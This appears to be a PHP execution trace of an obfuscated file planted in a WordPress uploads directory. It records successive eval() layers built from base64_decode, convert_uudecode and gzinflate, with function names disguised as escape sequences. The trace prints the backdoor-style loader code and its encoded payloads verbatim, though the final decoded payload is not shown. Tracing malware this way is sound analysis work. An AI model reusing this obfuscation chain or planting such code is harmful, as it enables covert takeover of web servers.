3 46 0 0.003145 545160 base64_decode 0 /var/www/html/uploads/wp-51.php(436) : eval()'d code 1 1 'ZVXbbts4EP2VouhDi7xQju0kKAqsLZGpLqRFcoaODL8Uzq5sUqnTlVtdvn7Hdi8P+2AY5PAMz5kzHL0bWLTpP70FG75qsWCG8a4Y09cymfqVSG/TwWCROLOOIyigu0nHvVODnDq/o7i+zdjSrfASTyR0rRyXFH9euPpVFcJptGwsrzgkXHAxG3LRvhJOK/68lPZ+yK/xp0t86AUKfpID3pcHOTOw85nQJ+NEFQd2Mgd2XySyQ9gR390pc0tTWMn0YWalq9vMNpXiCrW/4FpHuAKrWRl3oxLVWc+6wAsvr6DLAaa+vOpcF/asg01WFx37qw6qD7r6pEd+uddd7q0oL90L8uFaJ32tE6THdfeqcvvMMTGfrZU/5CEwZdXCJe6zcfLk6N7ygE3ujcvccZIxbApuNmsITQ58bhq+l2GjpO0aabFTDb6S7rnioVFO7lPLAm0zw3GQsOtXkEbShjtDdVawawrf+tTtRhX6DeEfMqhuDci5wfBD2Y2CJI1KtyPd'
3 46 1 0.003174 546984
3 46 R 'eU�n�8\020����C��P��$(\n�-��.�Er��\f�\024ήlR�ӕ[]�~�v/\017�`\030��\fϙ3\034�\033X��?�\005\033�j�`��\030��2���Ho�`�8��#(��IǽS��:������ҭ�\022O$t�\034�\024^��U\025�i�l,�8$\\p1\033rѾ\022N+����~ȯ�K|�\005\n~�\003ޗ\a93���\'�D\025\av2\av_$�C�\021��)sKSX��af����6��\n���ZG�\002�Y\031w�\022�YϺ�\v/���\001����\\\027���MV\027\035��\016�\017���G~��]�(/�\v��Z\'}�\023��u��r��11���?�!0e��%�q�����M���q�1l\nn6k\bM\016|n\032��a���\032i�S\r����QN�S�\002m3�q���W�F҆;CuV�k\n���F\025�\r�\0372�n\rȹ��Cٍ�$�J�#�]XC'
3 47 0 0.003239 546952 gzinflate 0 /var/www/html/uploads/wp-51.php(436) : eval()'d code 1 1 'eU�n�8\020����C��P��$(\n�-��.�Er��\f�\024ήlR�ӕ[]�~�v/\017�`\030��\fϙ3\034�\033X��?�\005\033�j�`��\030��2���Ho�`�8��#(��IǽS��:������ҭ�\022O$t�\034�\024^��U\025�i�l,�8$\\p1\033rѾ\022N+����~ȯ�K|�\005\n~�\003ޗ\a93���\'�D\025\av2\av_$�C�\021��)sKSX��af����6��\n���ZG�\002�Y\031w�\022�YϺ�\v/���\001����\\\027���MV\027\035��\016�\017���G~��]�(/�\v��Z\'}�\023��u��r��11���?�!0e��%�q�����M���q�1l\nn6k\bM\016|n\032��a���\032i�S\r����QN�S�\002m3�q���W�F҆;CuV�k\n���F\025�\r�\0372�n\rȹ��Cٍ�$�J�#�]XC'
3 47 1 0.003313 548776
3 47 R '$y01Zx="TSknQFA0R0EwLzIpPD4jOFI3IyRULDVRWC1TLTw+IzhVNyM4VjcjOFQ3J0BVOUVRWC1DMTwsMzBVNydAVgpNLFVQUS0zPTw+IzhUNyMkVC0yKFspJ0BQNEdBMS8yKTw+IzhXNyMkVyxFUFEtMyU8PiM5RTcjJFQtRVFYCk0tRi08LDMwUTcnQFctJVBRLSM0Qi5SMVgsJSlYNENUQjcjJFQsVVFYLUY5PCwzNFY3IyRWLUVQUS0jNTwKTT4jPFI3IyRWLSVRWC02OTwsMzhVNydAVy01UVgtQzE8LDMwVTcnQFYsVVBRLTM9PD4jOFQ3IyRULTIoWwpNKSdEUDRHSSMvMik0NSNAVDVHRVMtVS0jPiUlKjRVJVo2J0UlLERZWTklKTE6RlEhMkZNMSwlMSUwNlUpCk06NEklNVMhIS0kSUw0REUyMTcxOTI1MSk7RS0zNTclLjsjIVczNkxZMSU9JTY3RTM6RUkvNSZNTDI1PVcKTTwkWTI6'
3 48 0 0.003361 550224 eval 1 '$y01Zx="TSknQFA0R0EwLzIpPD4jOFI3IyRULDVRWC1TLTw+IzhVNyM4VjcjOFQ3J0BVOUVRWC1DMTwsMzBVNydAVgpNLFVQUS0zPTw+IzhUNyMkVC0yKFspJ0BQNEdBMS8yKTw+IzhXNyMkVyxFUFEtMyU8PiM5RTcjJFQtRVFYCk0tRi08LDMwUTcnQFctJVBRLSM0Qi5SMVgsJSlYNENUQjcjJFQsVVFYLUY5PCwzNFY3IyRWLUVQUS0jNTwKTT4jPFI3IyRWLSVRWC02OTwsMzhVNydAVy01UVgtQzE8LDMwVTcnQFYsVVBRLTM9PD4jOFQ3IyRULTIoWwpNKSdEUDRHSSMvMik0NSNAVDVHRVMtVS0jPiUlKjRVJVo2J0UlLERZWTklKTE6RlEhMkZNMSwlMSUwNlUpCk06NEklNVMhIS0kSUw0REUyMTcxOTI1MSk7RS0zNTclLjsjIVczNkxZMSU9JTY3RTM6RUkvNSZNTDI1PVcKTTwkWTI6VFkmNUdJNjBEUTM6JUk0NTRVWDVVLUc9VFEjMjMhNjE2PVA1Q2BVM0RcUDREVTE6Nk1QMkQ1SwpNPCU9SywjKTUsJTVZMlU1SyxUVSUsNEUuOkYxRjQmTTo1VT1aNkQ5MTVFRFU1RlExPCQtSywjPTAxJTRXCk00Nk0xKlUxWTwkNS40VyEzNiQwVTlFMFEtNTkqMTNgVjJGUUs8RFE0MkRNMT5ERVgzRC1YOUUhWi4mRTgKTSw2LFQ0NDk6MSU1NjVEUTg7JzEoNTdEUTQ0UTMyNlU5MTVESzJGTFgyVTE1M0RFMDEjNSM1VlFUMzRZTApNPiUpKzUkVUszJ0RYPTU5WjtXMSw6M0UjNEQ1KTtFJVowRFUyOjRUWDM1OTo2JSk2OyVBNSw1JVEyNTlXCk08NSUlNUU9KT40NVM1QyFLOjRJSzU3LTkwUzUhNTY9UDNEUUk5UzE4MUQpNzQmSTk+RSxQLjRFLzVGXUkKTTUkMFk5JFEjLjY5LjRUWTEyNlBYO0U1STM2SSw+REVIMzU5WDQkUU0wNkErNFM1LjNGTTE8RT0kLCZNNgpNMFNBWTVVLUssNFk1PiRdKjslJU0wVkxQPjRNNDkmKTE0VkEsMlNgVDxVQFA2N0kuPkU1UzU2UVAzVF0lCk02My03PjREUzRVPSE6NFEjPFZBMDUlKTA0RTRQLCU5WThWSTY1JUkoNVZMUDxVKSY9JC0sPjNBVzMnSUwKTTUlITQsNTUwPkctKzI2UUQwNUUnMDRNOTA2XF0oQ0wqMCY1Vjg2UEgpJ0BQNEdBNSgjVEApJ0BQNEdBMQpNKiIxWCwlKVg0QkBEPiMhMj4lYEgpJ0RQNEdJIyoyREkqM01gOTc5QTsiQEQ+IyEyPkU0QC8yYEQ+IyEyCk0+RSRIKSdAUDRHSTIqIjFYLCUpWjQiQEQ+IyFSPkNgSSoyREkuVCFFPUYlTCoiMVgsJSlaNUJgXSgiMVgKPiwlKVo2MkBEPiMhMj5FSEgpJ0BQNEdJOCoiMVgsJ0kyPjJESSoyRFsKYAo=";$j0yZk="\\143\\x6f\\156\\x76\\145\\x72\\164\\x5f\\165\\x75\\x64\\145\\x63\\157\\x64\\145";$i0yZk="\\142\\141\\x73\\x65\\66\\64\\x5f\\144\\x65\\x63\\157\\x64\\145";@eval ( $j0yZk($i0yZk($y01Zx)));' /var/www/html/uploads/wp-51.php(436) : eval()'d code 1 0
3 A /var/www/html/uploads/wp-51.php(436) : eval()'d code(1) : eval()'d code 1 $y01Zx = 'TSknQFA0R0EwLzIpPD4jOFI3IyRULDVRWC1TLTw+IzhVNyM4VjcjOFQ3J0BVOUVRWC1DMTwsMzBVNydAVgpNLFVQUS0zPTw+IzhUNyMkVC0yKFspJ0BQNEdBMS8yKTw+IzhXNyMkVyxFUFEtMyU8PiM5RTcjJFQtRVFYCk0tRi08LDMwUTcnQFctJVBRLSM0Qi5SMVgsJSlYNENUQjcjJFQsVVFYLUY5PCwzNFY3IyRWLUVQUS0jNTwKTT4jPFI3IyRWLSVRWC02OTwsMzhVNydAVy01UVgtQzE8LDMwVTcnQFYsVVBRLTM9PD4jOFQ3IyRULTIoWwpNKSdEUDRHSSMvMik0NSNAVDVHRVMtVS0jPiUlKjRVJVo2J0UlLERZWTklKTE6RlEhMkZNMSwlMSUwNlUpCk06NEklNVMhIS0kSUw0REUyMTcxOTI1MSk7RS0zNTclLjsjIVczNkxZMSU9JTY3RTM6RUkvNSZNTDI1PVcKTTwkWTI6VFkmNUdJ'
3 A /var/www/html/uploads/wp-51.php(436) : eval()'d code(1) : eval()'d code 1 $j0yZk = 'convert_uudecode'
3 A /var/www/html/uploads/wp-51.php(436) : eval()'d code(1) : eval()'d code 1 $i0yZk = 'base64_decode'
4 49 0 0.003466 550224 base64_decode 0 /var/www/html/uploads/wp-51.php(436) : eval()'d code(1) : eval()'d code 1 1 'TSknQFA0R0EwLzIpPD4jOFI3IyRULDVRWC1TLTw+IzhVNyM4VjcjOFQ3J0BVOUVRWC1DMTwsMzBVNydAVgpNLFVQUS0zPTw+IzhUNyMkVC0yKFspJ0BQNEdBMS8yKTw+IzhXNyMkVyxFUFEtMyU8PiM5RTcjJFQtRVFYCk0tRi08LDMwUTcnQFctJVBRLSM0Qi5SMVgsJSlYNENUQjcjJFQsVVFYLUY5PCwzNFY3IyRWLUVQUS0jNTwKTT4jPFI3IyRWLSVRWC02OTwsMzhVNydAVy01UVgtQzE8LDMwVTcnQFYsVVBRLTM9PD4jOFQ3IyRULTIoWwpNKSdEUDRHSSMvMik0NSNAVDVHRVMtVS0jPiUlKjRVJVo2J0UlLERZWTklKTE6RlEhMkZNMSwlMSUwNlUpCk06NEklNVMhIS0kSUw0REUyMTcxOTI1MSk7RS0zNTclLjsjIVczNkxZMSU9JTY3RTM6RUkvNSZNTDI1PVcKTTwkWTI6VFkmNUdJ'
4 49 1 0.003500 552048
4 49 R 'M)\'@P4GA0/2)<>#8R7#$T,5QX-S-<>#8U7#8V7#8T7\'@U9EQX-C1<,30U7\'@V\nM,UPQ-3=<>#8T7#$T-2([)\'@P4GA1/2)<>#8W7#$W,EPQ-3%<>#9E7#$T-EQX\nM-F-<,30Q7\'@W-%PQ-#4B.R1X,%)X4CTB7#$T,UQX-F9<,34V7#$V-EPQ-#5<\nM>#<R7#$V-%QX-69<,38U7\'@W-5QX-C1<,30U7\'@V,UPQ-3=<>#8T7#$T-2([\nM)\'DP4GI#/2)45#@T5GES-U-#>%%*4U%Z6\'E%,DYY9%)1:FQ!2FM1,%1%06U)\nM:4I%5S!!-$IL4DE21719251);E-357%.;#!W36LY1%=%67E3:EI/5&ML25=W\nM<$Y2:TY&5GI60DQ3:%I454UX5U-G=TQ#23!616=P5C`U3D\\P4DU1:6MP2D5K\nM<%=K,#)5,%5Y2U5K,TU%,4E.:F1F4&M:5U=Z6D915EDU5FQ1<$-K,#=01%4W'
4 50 0 0.003532 552016 convert_uudecode 0 /var/www/html/uploads/wp-51.php(436) : eval()'d code(1) : eval()'d code 1 1 'M)\'@P4GA0/2)<>#8R7#$T,5QX-S-<>#8U7#8V7#8T7\'@U9EQX-C1<,30U7\'@V\nM,UPQ-3=<>#8T7#$T-2([)\'@P4GA1/2)<>#8W7#$W,EPQ-3%<>#9E7#$T-EQX\nM-F-<,30Q7\'@W-%PQ-#4B.R1X,%)X4CTB7#$T,UQX-F9<,34V7#$V-EPQ-#5<\nM>#<R7#$V-%QX-69<,38U7\'@W-5QX-C1<,30U7\'@V,UPQ-3=<>#8T7#$T-2([\nM)\'DP4GI#/2)45#@T5GES-U-#>%%*4U%Z6\'E%,DYY9%)1:FQ!2FM1,%1%06U)\nM:4I%5S!!-$IL4DE21719251);E-357%.;#!W36LY1%=%67E3:EI/5&ML25=W\nM<$Y2:TY&5GI60DQ3:%I454UX5U-G=TQ#23!616=P5C`U3D\\P4DU1:6MP2D5K\nM<%=K,#)5,%5Y2U5K,TU%,4E.:F1F4&M:5U=Z6D915EDU5FQ1<$-K,#=01%4W'
4 50 1 0.003563 552944
4 50 R '$x0RxP="\\x62\\141\\x73\\x65\\66\\64\\x5f\\x64\\145\\x63\\157\\x64\\145";$x0RxQ="\\x67\\172\\151\\x6e\\146\\x6c\\141\\x74\\145";$x0RxR="\\143\\x6f\\156\\166\\145\\x72\\164\\x5f\\165\\x75\\x64\\145\\x63\\157\\x64\\145";$y0RzC="TT84Vys7SCxQJSQzXyE2NydRQjlAJkQ0TEAmIiJEW0A4JlRIREtYITInSSUqNl0wMk9DWEYySjZOTklIWwpNRkNFVzVBLShZTUMxWSgwLCI0VEgpV05NO0RMQikpJEkpWk02U0UyKUk3ME1INjdfPkZWWzZFQVY5VlQpCk07PDU7QkQ+TypENSpSXD5fT15VJE06JlkrLTJKQzIxNCxfPz8iX1c4QFZDUVVLXltHUy1QLSImYEY+Jk8KTUNIPD5CWltMNlxRKTMkLy8uVzotLi9CREInQz'
4 51 0 0.003616 555656 eval 1 '$x0RxP="\\x62\\141\\x73\\x65\\66\\64\\x5f\\x64\\145\\x63\\157\\x64\\145";$x0RxQ="\\x67\\172\\151\\x6e\\146\\x6c\\141\\x74\\145";$x0RxR="\\143\\x6f\\156\\166\\145\\x72\\164\\x5f\\165\\x75\\x64\\145\\x63\\157\\x64\\145";$y0RzC="TT84Vys7SCxQJSQzXyE2NydRQjlAJkQ0TEAmIiJEW0A4JlRIREtYITInSSUqNl0wMk9DWEYySjZOTklIWwpNRkNFVzVBLShZTUMxWSgwLCI0VEgpV05NO0RMQikpJEkpWk02U0UyKUk3ME1INjdfPkZWWzZFQVY5VlQpCk07PDU7QkQ+TypENSpSXD5fT15VJE06JlkrLTJKQzIxNCxfPz8iX1c4QFZDUVVLXltHUy1QLSImYEY+Jk8KTUNIPD5CWltMNlxRKTMkLy8uVzotLi9CREInQzBMRiM8MVZXRVlXU1QqIVwqQEVWIyEsV0kiJkUsYC5AUgpNLig4XFBWPjYzS09IOVoiTD9dLC9fNSNQIl8nUiMjLzIhMVxPLmAhKS5NNkQrWD0kVC8yWSk1NUxOJlQmCk0yKTdbQShLK04sX0YzNzUsUlpOOEY3WyI3SWAiLCshPTRPRU00VycjVTZHWk0sRFtCLy8wLzlTPT1UPzsKIldAYGAKYAo=";\n@eval($x0RxU = $x0RxQ($x0RxR($x0RxP($y0RzC))));@eval($x0RzU = $x0RzQ($x0RzR($x0RzP($x0rz0))));@eval($x0RzV = $x0RzY($x0RzZ($x0RzX($x0zRy))));' /var/www/html/uploads/wp-51.php(436) : eval()'d code(1) : eval()'d code 1 0
4 A /var/www/html/uploads/wp-51.php(436) : eval()'d code(1) : eval()'d code(1) : eval()'d code 1 $x0RxP = 'base64_decode'
4 A /var/www/html/uploads/wp-51.php(436) : eval()'d code(1) : eval()'d code(1) : eval()'d code 1 $x0RxQ = 'gzinflate'
4 A /var/www/html/uploads/wp-51.php(436) : eval()'d code(1) : eval()'d code(1) : eval()'d code 1 $x0RxR = 'convert_uudecode'
4 A /var/www/html/uploads/wp-51.php(436) : eval()'d code(1) : eval()'d code(1) : eval()'d code 1 $y0RzC = 'TT84Vys7SCxQJSQzXyE2NydRQjlAJkQ0TEAmIiJEW0A4JlRIREtYITInSSUqNl0wMk9DWEYySjZOTklIWwpNRkNFVzVBLShZTUMxWSgwLCI0VEgpV05NO0RMQikpJEkpWk02U0UyKUk3ME1INjdfPkZWWzZFQVY5VlQpCk07PDU7QkQ+TypENSpSXD5fT15VJE06JlkrLTJKQzIxNCxfPz8iX1c4QFZDUVVLXltHUy1QLSImYEY+Jk8KTUNIPD5CWltMNlxRKTMkLy8uVzotLi9CREInQzBMRiM8MVZXRVlXU1QqIVwqQEVWIyEsV0kiJkUsYC5AUgpNLig4XFBWPjYzS09IOVoiTD9dLC9fNSNQIl8nUiMjLzIhMVxPLmAhKS5NNkQrWD0kVC8yWSk1NUxOJlQmCk0yKTdbQShLK04sX0YzNzUsUlpOOEY3WyI3SWAiLCshPTRPRU00VycjVTZHWk0sRFtCLy8wLzlTPT1UPzsKIldAYGAKYAo='
5 52 0 0.003714 555656 base64_decode 0 /var/www/html/uploads/wp-51.php(436) : eval()'d code(1) : eval()'d code(1) : eval()'d code 2 1 'TT84Vys7SCxQJSQzXyE2NydRQjlAJkQ0TEAmIiJEW0A4JlRIREtYITInSSUqNl0wMk9DWEYySjZOTklIWwpNRkNFVzVBLShZTUMxWSgwLCI0VEgpV05NO0RMQikpJEkpWk02U0UyKUk3ME1INjdfPkZWWzZFQVY5VlQpCk07PDU7QkQ+TypENSpSXD5fT15VJE06JlkrLTJKQzIxNCxfPz8iX1c4QFZDUVVLXltHUy1QLSImYEY+Jk8KTUNIPD5CWltMNlxRKTMkLy8uVzotLi9CREInQzBMRiM8MVZXRVlXU1QqIVwqQEVWIyEsV0kiJkUsYC5AUgpNLig4XFBWPjYzS09IOVoiTD9dLC9fNSNQIl8nUiMjLzIhMVxPLmAhKS5NNkQrWD0kVC8yWSk1NUxOJlQmCk0yKTdbQShLK04sX0YzNzUsUlpOOEY3WyI3SWAiLCshPTRPRU00VycjVTZHWk0sRFtCLy8wLzlTPT1UPzsKIldAYGAKYAo='
5 52 1 0.003740 556328
5 52 R 'M?8W+;H,P%$3_!67\'QB9@&D4L@&""D[@8&THDKX!2\'I%*6]02OCXF2J6NNIH[\nMFCEW5A-(YMC1Y(0,"4TH)WNM;DLB))$I)ZM6SE2)I70MH67_>FV[6EAV9VT)\nM;<5;BD>O*D5*R\\>_O^U$M:&Y+-2JC214,_??"_W8@VCQUK^[GS-P-"&`F>&O\nMCH<>BZ[L6\\Q)3$//.W:-./BDB\'C0LF#<1VWEYWST*!\\*@EV#!,WI"&E,`.@R\nM.(8\\PV>63KOH9Z"L?],/_5#P"_\'R##/2!1\\O.`!).M6D+X=$T/2Y)55LN&T&\nM2)7[A(K+N,_F375,RZN8F7["7I`",+!=4OEM4W\'#U6GZM,D[B//0/9S==T?;\n"W@``\n`\n'
5 53 0 0.003767 556296 convert_uudecode 0 /var/www/html/uploads/wp-51.php(436) : eval()'d code(1) : eval()'d code(1) : eval()'d code 2 1 'M?8W+;H,P%$3_!67\'QB9@&D4L@&""D[@8&THDKX!2\'I%*6]02OCXF2J6NNIH[\nMFCEW5A-(YMC1Y(0,"4TH)WNM;DLB))$I)ZM6SE2)I70MH67_>FV[6EAV9VT)\nM;<5;BD>O*D5*R\\>_O^U$M:&Y+-2JC214,_??"_W8@VCQUK^[GS-P-"&`F>&O\nMCH<>BZ[L6\\Q)3$//.W:-./BDB\'C0LF#<1VWEYWST*!\\*@EV#!,WI"&E,`.@R\nM.(8\\PV>63KOH9Z"L?],/_5#P"_\'R##/2!1\\O.`!).M6D+X=$T/2Y)55LN&T&\nM2)7[A(K+N,_F375,RZN8F7["7I`",+!=4OEM4W\'#U6GZM,D[B//0/9S==T?;\n"W@``\n`\n'
5 53 1 0.003797 556648
5 53 R '}��n�0\024D�\005e��&`\032E,�`���\030\033J$��R\036�J[�\022�>&J����;�9wV\023H����\f\tM(\'{�nK"$�)\'�V�T��t-�e�zm�ZXvgm\tm�[�G�*EJ�ǿ��D���,Ԫ�$T3��\v�h�ֿ��3p4!��ᯎ�\036���[�ILC�;v�8���xв`�Gm��|�(\037\n�]�\004��\biL\000�28�<�g�N��g���\017�P�\v��\f3�\005\037/8\000I:դ/�D��%Ul�m\006H����˸��MuL˫��~�^�\0020�]R�mSq��i���;���=��wG��\000'
5 54 0 0.003839 555976 gzinflate 0 /var/www/html/uploads/wp-51.php(436) : eval()'d code(1) : eval()'d code(1) : eval()'d code 2 1 '}��n�0\024D�\005e��&`\032E,�`���\030\033J$��R\036�J[�\022�>&J����;�9wV\023H����\f\tM(\'{�nK"$�)\'�V�T��t-�e�zm�ZXvgm\tm�[�G�*EJ�ǿ��D���,Ԫ�$T3��\v�h�ֿ��3p4!��ᯎ�\036���[�ILC�;v�8���xв`�Gm��|�(\037\n�]�\004��\biL\000�28�<�g�N��g���\017�P�\v��\f3�\005\037/8\000I:դ/�D��%Ul�m\006H����˸��MuL˫��~�^�\0020�]R�mSq��i���;���=��wG��\000'
5 54 1 0.003885 556456
5 54 R '$x0RzP="\\x62\\141\\x73\\x65\\66\\64\\x5f\\x64\\145\\x63\\157\\x64\\145";$x0RzQ="\\x67\\172\\151\\x6e\\146\\x6c\\141\\x74\\145";$x0RzR="\\143\\x6f\\156\\166\\145\\x72\\164\\x5f\\165\\x75\\x64\\145\\x63\\157\\x64\\145";$x0rz0="TT04VFsjSGBQIyQvTzRPNGBBLjhTKCJbISEiQEtHIidCXStBNSpbJFA2JEhML1NPJ00jV1tGSVFYQUxDIwpNQkg+KkpbSlJBXVFQJjEqWFE0RUxfJkcpRTNUOiJdP2AiV0JdXCJNTltHVz9dLUcyTzQ+MFBEU00pQDRdCihdS2A+NU89Xj1FXGAKYAo=";'
4 A /var/www/html/uploads/wp-51.php(436) : eval()'d code(1) : eval()'d code(1) : eval()'d code 2 $x0RxU = '$x0RzP="\\x62\\141\\x73\\x65\\66\\64\\x5f\\x64\\145\\x63\\157\\x64\\145";$x0RzQ="\\x67\\172\\151\\x6e\\146\\x6c\\141\\x74\\145";$x0RzR="\\143\\x6f\\156\\166\\145\\x72\\164\\x5f\\165\\x75\\x64\\145\\x63\\157\\x64\\145";$x0rz0="TT04VFsjSGBQIyQvTzRPNGBBLjhTKCJbISEiQEtHIidCXStBNSpbJFA2JEhML1NPJ00jV1tGSVFYQUxDIwpNQkg+KkpbSlJBXVFQJjEqWFE0RUxfJkcpRTNUOiJdP2AiV0JdXCJNTltHVz9dLUcyTzQ+MFBEU00pQDRdCihdS2A+NU89Xj1FXGAKYAo=";'
5 55 0 0.003950 557976 eval 1 '$x0RzP="\\x62\\141\\x73\\x65\\66\\64\\x5f\\x64\\145\\x63\\157\\x64\\145";$x0RzQ="\\x67\\172\\151\\x6e\\146\\x6c\\141\\x74\\145";$x0RzR="\\143\\x6f\\156\\166\\145\\x72\\164\\x5f\\165\\x75\\x64\\145\\x63\\157\\x64\\145";$x0rz0="TT04VFsjSGBQIyQvTzRPNGBBLjhTKCJbISEiQEtHIidCXStBNSpbJFA2JEhML1NPJ00jV1tGSVFYQUxDIwpNQkg+KkpbSlJBXVFQJjEqWFE0RUxfJkcpRTNUOiJdP2AiV0JdXCJNTltHVz9dLUcyTzQ+MFBEU00pQDRdCihdS2A+NU89Xj1FXGAKYAo=";' /var/www/html/uploads/wp-51.php(436) : eval()'d code(1) : eval()'d code(1) : eval()'d code 2 0
5 A /var/www/html/uploads/wp-51.php(436) : eval()'d code(1) : eval()'d code(1) : eval()'d code(2) : eval()'d code 1 $x0RzP = 'base64_decode'
5 A /var/www/html/uploads/wp-51.php(436) : eval()'d code(1) : eval()'d code(1) : eval()'d code(2) : eval()'d code 1 $x0RzQ = 'gzinflate'
5 A /var/www/html/uploads/wp-51.php(436) : eval()'d code(1) : eval()'d code(1) : eval()'d code(2) : eval()'d code 1 $x0RzR = 'convert_uudecode'
5 A /var/www/html/uploads/wp-51.php(436) : eval()'d code(1) : eval()'d code(1) : eval()'d code(2) : eval()'d code 1 $x0rz0 = 'TT04VFsjSGBQIyQvTzRPNGBBLjhTKCJbISEiQEtHIidCXStBNSpbJFA2JEhML1NPJ00jV1tGSVFYQUxDIwpNQkg+KkpbSlJBXVFQJjEqWFE0RUxfJkcpRTNUOiJdP2AiV0JdXCJNTltHVz9dLUcyTzQ+MFBEU00pQDRdCihdS2A+NU89Xj1FXGAKYAo='
5 55 1 0.004036 557976
5 56 0 0.004045 557176 base64_decode 0 /var/www/html/uploads/wp-51.php(436) : eval()'d code(1) : eval()'d code(1) : eval()'d code 2 1 'TT04VFsjSGBQIyQvTzRPNGBBLjhTKCJbISEiQEtHIidCXStBNSpbJFA2JEhML1NPJ00jV1tGSVFYQUxDIwpNQkg+KkpbSlJBXVFQJjEqWFE0RUxfJkcpRTNUOiJdP2AiV0JdXCJNTltHVz9dLUcyTzQ+MFBEU00pQDRdCihdS2A+NU89Xj1FXGAKYAo='
5 56 1 0.004067 557432
5 56 R 'M=8T[#H`P#$/O4O4`A.8S("[!!"@KG"\'B]+A5*[$P6$HL/SO\'M#W[FIQXALC#\nMBH>*J[JRA]QP&1*XQ4EL_&G)E3T:"]?`"WB]\\"MN[GW?]-G2O4>0PDSM)@4]\n(]K`>5O=^=E\\`\n`\n'
5 57 0 0.004089 557400 convert_uudecode 0 /var/www/html/uploads/wp-51.php(436) : eval()'d code(1) : eval()'d code(1) : eval()'d code 2 1 'M=8T[#H`P#$/O4O4`A.8S("[!!"@KG"\'B]+A5*[$P6$HL/SO\'M#W[FIQXALC#\nMBH>*J[JRA]QP&1*XQ4EL_&G)E3T:"]?`"WB]\\"MN[GW?]-G2O4>0PDSM)@4]\n(]K`>5O=^=E\\`\n`\n'
5 57 1 0.004111 557592
5 57 R 'u�;\016�0\fC�R�\000��3 .�\004(+�!��U+�0XJ,?;Ǵ=���x��Ê�������p\031\022��Il�iɕ=\032\v�\vx��+n�}���ҽG��L�&\005=��\036V�~v_'
5 58 0 0.004137 557336 gzinflate 0 /var/www/html/uploads/wp-51.php(436) : eval()'d code(1) : eval()'d code(1) : eval()'d code 2 1 'u�;\016�0\fC�R�\000��3 .�\004(+�!��U+�0XJ,?;Ǵ=���x��Ê�������p\031\022��Il�iɕ=\032\v�\vx��+n�}���ҽG��L�&\005=��\036V�~v_'
5 58 1 0.004168 557592
5 58 R '$x0RzX="\\142\\141\\x73\\x65\\66\\64\\x5f\\144\\145\\x63\\157\\144\\145";$x0RzY="\\147\\172\\151\\x6e\\146\\154\\141\\x74\\145";$x0RzZ="\\143\\157\\156\\166\\145\\162\\164\\x5f\\165\\x75\\x64\\145\\x63\\157\\144\\145";'
4 A /var/www/html/uploads/wp-51.php(436) : eval()'d code(1) : eval()'d code(1) : eval()'d code 2 $x0RzU = '$x0RzX="\\142\\141\\x73\\x65\\66\\64\\x5f\\144\\145\\x63\\157\\144\\145";$x0RzY="\\147\\172\\151\\x6e\\146\\154\\141\\x74\\145";$x0RzZ="\\143\\157\\156\\166\\145\\162\\164\\x5f\\165\\x75\\x64\\145\\x63\\157\\144\\145";'
5 59 0 0.004219 558064 eval 1 '$x0RzX="\\142\\141\\x73\\x65\\66\\64\\x5f\\144\\145\\x63\\157\\144\\145";$x0RzY="\\147\\172\\151\\x6e\\146\\154\\141\\x74\\145";$x0RzZ="\\143\\157\\156\\166\\145\\162\\164\\x5f\\165\\x75\\x64\\145\\x63\\157\\144\\145";' /var/www/html/uploads/wp-51.php(436) : eval()'d code(1) : eval()'d code(1) : eval()'d code 2 0
5 A /var/www/html/uploads/wp-51.php(436) : eval()'d code(1) : eval()'d code(1) : eval()'d code(2) : eval()'d code 1 $x0RzX = 'base64_decode'
5 A /var/www/html/uploads/wp-51.php(436) : eval()'d code(1) : eval()'d code(1) : eval()'d code(2) : eval()'d code 1 $x0RzY = 'gzinflate'
5 A /var/www/html/uploads/wp-51.php(436) : eval()'d code(1) : eval()'d code(1) : eval()'d code(2) : eval()'d code 1 $x0RzZ = 'convert_uudecode'
5 59 1 0.004283 558064
5 60 0 0.004291 557416 base64_decode 0 /var/www/html/uploads/wp-51.php(436) : eval()'d code(1) : eval()'d code(1) : eval()'d code 2 1 'TUc1MU06XUxQJC9bPjdXJFNgPU8wLjBTKi9LMUQpOjEuJlRDSlMnOFYxRU4kOFJGKUYiLVlMTVBORS9TVwpNRzlRNy1SVClUUD0rRU5aPj5eWjFbT0AkRyQqSzchOS5AV19BWVZgJVhURTlJKEdGNEQiTlkjLkdDLClYCk1gMi9RNlxANzA9RFMzXUc3Il9ALDc8NDghIitDQEwnUDtAQDszWkRMJVVITUYiMTlQNVFYQTFFKyolLi4KTVU5PEtXJE44OjlVPy1JTEVfN0tBSTcrPk0tUEtIKVBZLiJUQVM5KkJAKyc0SSEzKUcpVl1HSVQhQ0RESQpNVEhJNSlKPi42VlZNM1xRSFwhUTpUIiIxJ19bUFBQPFtdYD0hWykvVlM0VUgvVVdNUyNgRSs1LjlVOFNPCk1YR0A4VjReJk0iViUjPT1AJlg6JSM5PktFO1YnNCpLKj4wT0RAODZJNiNDN2A8RT0kLDQoWk01OD8xX1kKTTQ0USY4Ol8mOkc1'
5 60 1 0.004321 558984
5 60 R 'MG51M:]LP$/[>7W$S`=O0.0S*/K1D):1.&TCJS\'8V1EN$8RF)F"-YLMPNE/SW\nMG9Q7-RT)TP=+ENZ>>^Z1[O@$G$*K7!9.@W_AYV`%XTE9I(GF4D"NY#.GC,)X\nM`2/Q6\\@70=DS3]G7"_@,7<48!"+C@L\'P;@@;3ZDL%UHMF"19P5QXA1E+*%..\nMU9<KW$N8:9U?-ILE_7KAI7+>M-PKH)PY."TAS9*B@+\'4I!3)G)V]GIT!CDDI\nMTHI5)J>.6VVM3\\QH\\!Q:T""1\'_[PPP<[]`=![)/VS4UH/UWMS#`E+5.9U8SO\nMXG@8V4^&M"V%#==@&X:%#9>KE;V\'4*K*>0OD@86I6#C7`<E=$,4(ZM58?1_Y\nM44Q&8:_&:G5.>O?=`+&M?G`+EC=E>B8+/5X8%9QWP5W/@NA7%/L#J!-8`]ZW\nM!WY%P7H4U@?Q/`R(,D\',YPPP80-$$\\T<R]SC4=>(J6>FX#Z9;YS_F\\4:*I('
